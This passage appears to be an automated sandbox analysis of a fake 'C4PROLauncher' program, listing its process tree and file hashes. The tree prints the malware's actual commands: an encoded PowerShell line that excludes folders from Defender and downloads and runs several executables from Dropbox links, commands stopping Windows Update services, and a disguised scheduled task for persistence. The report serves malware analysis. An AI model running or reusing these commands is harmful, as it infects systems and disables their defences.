                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4632
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AdvancedDefender.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\AdvancedDefender.exe"
                                                                                                                                            4⤵
                                                                                                                                            • Modifies WinLogon for persistence
                                                                                                                                            • Checks computer location settings
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:624
                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                              "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                              5⤵
                                                                                                                                                PID:3776
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                                  6⤵
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  PID:3672
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                                                                                                                5⤵
                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                PID:2140
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:3284
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                                                                                                                                                5⤵
                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                PID:2836
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                                                                                                                              4⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3328
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                          2⤵
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:5012
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                          2⤵
                                                                                                                                            PID:2552
                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                              sc stop UsoSvc
                                                                                                                                              3⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:4228
                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                              sc stop WaaSMedicSvc
                                                                                                                                              3⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:2588
                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                              sc stop wuauserv
                                                                                                                                              3⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:4036
                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                              sc stop bits
                                                                                                                                              3⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:1836
                                                                                                                                            • C:\Windows\System32\sc.exe
                                                                                                                                              sc stop dosvc
                                                                                                                                              3⤵
                                                                                                                                              • Launches sc.exe
                                                                                                                                              PID:4824
                                                                                                                                          • C:\Windows\System32\dialer.exe
                                                                                                                                            C:\Windows\System32\dialer.exe
                                                                                                                                            2⤵
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:2112
                                                                                                                                          • C:\Windows\System32\dialer.exe
                                                                                                                                            C:\Windows\System32\dialer.exe
                                                                                                                                            2⤵
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:4208
                                                                                                                                          • C:\Users\Admin\Downloads\C4PROLauncher.exe
                                                                                                                                            "C:\Users\Admin\Downloads\C4PROLauncher.exe"
                                                                                                                                            2⤵
                                                                                                                                              PID:4720
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                                3⤵
                                                                                                                                                  PID:4636
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                                    4⤵
                                                                                                                                                      PID:4648
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAawBtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBrAGEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbQB3AGoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABrAHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGQAbAAuAGQAcgBvAHAAYgBvAHgAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBzAC8ANwA2AG0ANgB4AHAAawA0AGMAZgB3ADYAdQAzAGwALwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACwAIAA8ACMAeQBjAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB0AG4AYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AHgAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAKQA8ACMAYQB5AHAAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZABsAC4AZAByAG8AcABiAG8AeAB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvAHMALwB2AHgAYgBxAHkAaQBrAHUAZQBkAHQANgB0ADEAMgAvAEEAZAB2AGEAbgBjAGUAZABEAGUAZgBlAG4AZABlAHIALgBlAHgAZQAnACwAIAA8ACMAagBwAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBsAGQAYwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGUAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAGQAdgBhAG4AYwBlAGQARABlAGYAZQBuAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAGEAegBiACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGQAbAAuAGQAcgBvAHAAYgBvAHgAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBzAC8AdwBnADQANwAwAHAANgBzAGkAegAxADgAbQBtAGwALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBoAHQAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG4AZgBpACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAcQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHEAbABjACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGQAbAAuAGQAcgBvAHAAYgBvAHgAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBzAC8AYgBrAHQAMgBoAG8AdgA5AGgAegB2AHQAdABuADUALwAxAC4AZQB4AGUAJwAsACAAPAAjAGoAegB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQBqAGoAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQApADwAIwByAHQAYQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAHkAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABjAHEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBkAGEAYQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAHAAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaQBxAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQQBkAHYAYQBuAGMAZQBkAEQAZQBmAGUAbgBkAGUAcgAuAGUAeABlACcAKQA8ACMAawB6AG4AIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABuAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAZwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwBhAHoAdAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBtAGMAdgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQB5AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQA8ACMAdQBuAHAAIwA+AA=="
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4064
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:780
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\AdvancedDefender.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\AdvancedDefender.exe"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:1532
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==
                                                                                                                                                              5⤵
                                                                                                                                                                PID:4204
                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 4204 -s 300
                                                                                                                                                                  6⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  PID:4916
                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                                                                                                                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:4040
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:3784
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1.exe"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:2720
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:2232
                                                                                                                                                              • C:\Windows\system32\taskhostw.exe
                                                                                                                                                                taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2776
                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:1764
                                                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:1640
                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:1572
                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:1396
                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:1360
                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:1264
                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                                                                                                                              1⤵
                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                              PID:1136
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:3920
                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:1048
                                                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:908
                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:948
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:1092
                                                                                                                                                                                      • C:\Windows\System32\rundll32.exe
                                                                                                                                                                                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:3364
                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:3932
                                                                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                                                                            C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:468
                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 416 -p 3500 -ip 3500
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2420
                                                                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                  C:\Windows\system32\WerFault.exe -pss -s 436 -p 3404 -ip 3404
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:3564
                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -pss -s 444 -p 352 -ip 352
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:3584
                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 556 -p 4204 -ip 4204
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:3424
                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 352 -s 248
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                      PID:2156

                                                                                                                                                                                                    Network

                                                                                                                                                                                                    MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER88AA.tmp.csv

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      37KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      f679db35cb082e5c785d6c9fe19b1304

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      32f781c5723f63c2bd1985d6a7f1c4c1e84baf86

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      a1acf827272e0cab6ab1be8fa8af7e1a62ed5b7ca0781dfb72a81b6c03024e88

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      4dd362ba01d1661432b1350660c50da00253cb23568d8a7fbc38acbb3d7fd6b322ab8dfee45b3e9e008fd8d6845744cab54e34b424f44a6b38c7169d0a3c80e9

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER89B4.tmp.txt

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      13KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      ba9956b7face891944a76fc7b8accdc7

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      e744ab73f0d538ca7cfbfcae9b8903834b1fd22b

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      7b4ca9ed837136ed4baf5eaaf9473fad0cc0fd95b07e72dfa090aaee5ae1f094

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      76ec09d6cb02ddf6d2dd84211826fdd4e30f1c90ccd120643418fb0c7fc9299ea7040d48f67156d4032fe6c5c7202bbbcebbd2408823d8f02d6dfe9dcf62d0c1

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A32.tmp.csv

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      37KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      fad6a94bcbfc0bcb700eb9880f8becf2

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      92075117a2c4c836db310d1139e689e64b282005

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      68800f871b88252a9cb86146d014ba04d60a5c44c93c9af9c82b0f57d696cf46

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      7034aaa0bae5543ea036198764b858854b52b86bea889e234227c98d22d66f76767257feab4251ced4c049f5b677f8063529d690992ea49eb7515a231cbe3aa8

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A81.tmp.txt

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      13KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      bc051a21ac26f726823d9354ba57fb6a

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      bb97ab3867c035e996d7f3729634f4dc036eedef

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      387ab3ea60cf48a1a64985f26888b7e81cf4969e7139d1587c453cfeddb00988

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      f6da9100ae2a8158acc9992494accf55f17c59d81ecaea5b2c5314b7be2477f5f35506db06e4b18dbe76b2dd6d5aeead30cbe384549f38cda1cce4d037208668

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WERE043.tmp.csv

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      35KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      5dbee21785e7ed6925c30afc1433f53f

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      5c7d14320a2914666465eac6721f75a2c771f6a9

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      94676c535728b2f7177e95def8296d8de188c63bd7f5b5fa928781d05708671e

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      c862951fc78443138bbfe20b4cb9cd1c4819c7ecf9a33a9f48cbe5a471c2ec29aa3ca8aa95bb224b431a5b018e81355504486addcb60c1c3f3c7ddc3bdae9c5e

                                                                                                                                                                                                    • C:\ProgramData\Microsoft\Windows\WER\Temp\WERE0D1.tmp.txt

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      13KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      8b38fe5cda3ebd85461f28d9a0ebbf9a

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      a1d06c1cddb1b4d0accc5b79c5c41ff482585efb

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      4f014a99f0cd91d2512b80715d9bb3b66d71ef65f16a7a4a016f649bd0b8ab66

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      9717d16fd1605e39c1c0bb9b0ddc91d698e36624946d4e3dc7263dc96668f2d3e5f9e9d858762310494ee7616c08c627923e1f4a9976cb3a4e82f8c43d7034a0

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      58KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      5f79e2a838294a2636c40372645816dc

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      c80d715ec348ef7772df736506a3d5c77f70d979

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      dc9f7b32301a713835bb30236a398c9af57da32dc748a2b3700775cdae6da295

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      8b8921473d8eead36b92df36d6f5837b3e3389e0ac17e35452ccccd8b24657d74a3600dedfebab79dfe078da779649918179a3c27fb032b4bd6fc3a9d3924126

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000d

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      54KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      384a7dc9c173f799109373f87f51827e

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      30ea28c8d6705a61c492f36da4031e7b665c83ef

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      2383dc0527a6e4b620c6a0bb4c645690a6c67369f2d3d23adbebffba15d6a8e6

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      94d81fcc77940e4304dab1a9e1d13d9553f4d9548c168cb72d6d0c223d82022f0264562defdb6323f2d269d875f270e86e9ee4336951ab4d6f94f8da2003d800

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      61KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      80865706accbfa7f50484881a1ad75c5

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      5f1f595a95ec29cda2873c739701df17204ffa72

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      6eb715f33114f10815aa53745e07dbb832e3a1629004aa4eb824aed42f5c6bcd

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      1b3dd7980dffa16cf06016ea20835ab416723d9794b25a9f6e5eecacb8c44edee658343b8a081942c38da8f0a0b08bd8c2104b1ee7110a64ba8a8123f243dbdc

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000032

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      162KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      475f3b2f4b6829f089f959d8291c69ab

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      10cfe4b0bad5e7fc4c1bd4c4f79f9cc32ed93c99

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      4f40a7d3b7ddf8e77c9b9556b37cdbc062bda1e20757b4c709adcd3ee624b219

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      fb2b2fb4b86dac393e35c42e66e327af699fa1c6baefdeb4ce9f95298990faed0ad556475d16ba6ad31868412f6179d996cff7c15329f4ef92778be592e9d712

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      a5dd3fc5aff7ab216bb4956fcb04ac44

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      e629a455d1d8ed0ccee22b74da704271fdb02b64

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      175dcc8c4432776605a178f3e3a204d81e08555d2b47f9f1bba404dd88d7383b

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      0e4bfd947cd9f101ed73b0380f84b341591038c73e2c1f0e5761a8e2e7aa4d7f1ba3b361fc85bb74fd04506cbc322500576e5617ff45dbed60d519f231763f8e

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      504B

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      993001b33a11c8c5d0e5073c4683975b

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      25e81395665b698a1de254c978302e648cbd1445

                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                      03873d7df005fd453d9499baaaf727721306db6d3cc22506ee3b6aca45b1cd31

                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                      3cacbb4e9e671746aa3dcd433b5fa40e7b5f4e5fe812495d38859e8885643bfb141305fd00ab9e56636666a85c2f69fbd78f8271c7d397e8d4888603a09b5352

                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                      1KB

                                                                                                                                                                                                      MD5

                                                                                                                                                                                                      d506e3773b3026c295fab998f65bd4a5

                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                      38fd931778101c6a3ad6c501454fc8d1da521804

                                                                                                                                                                                                      SHA256

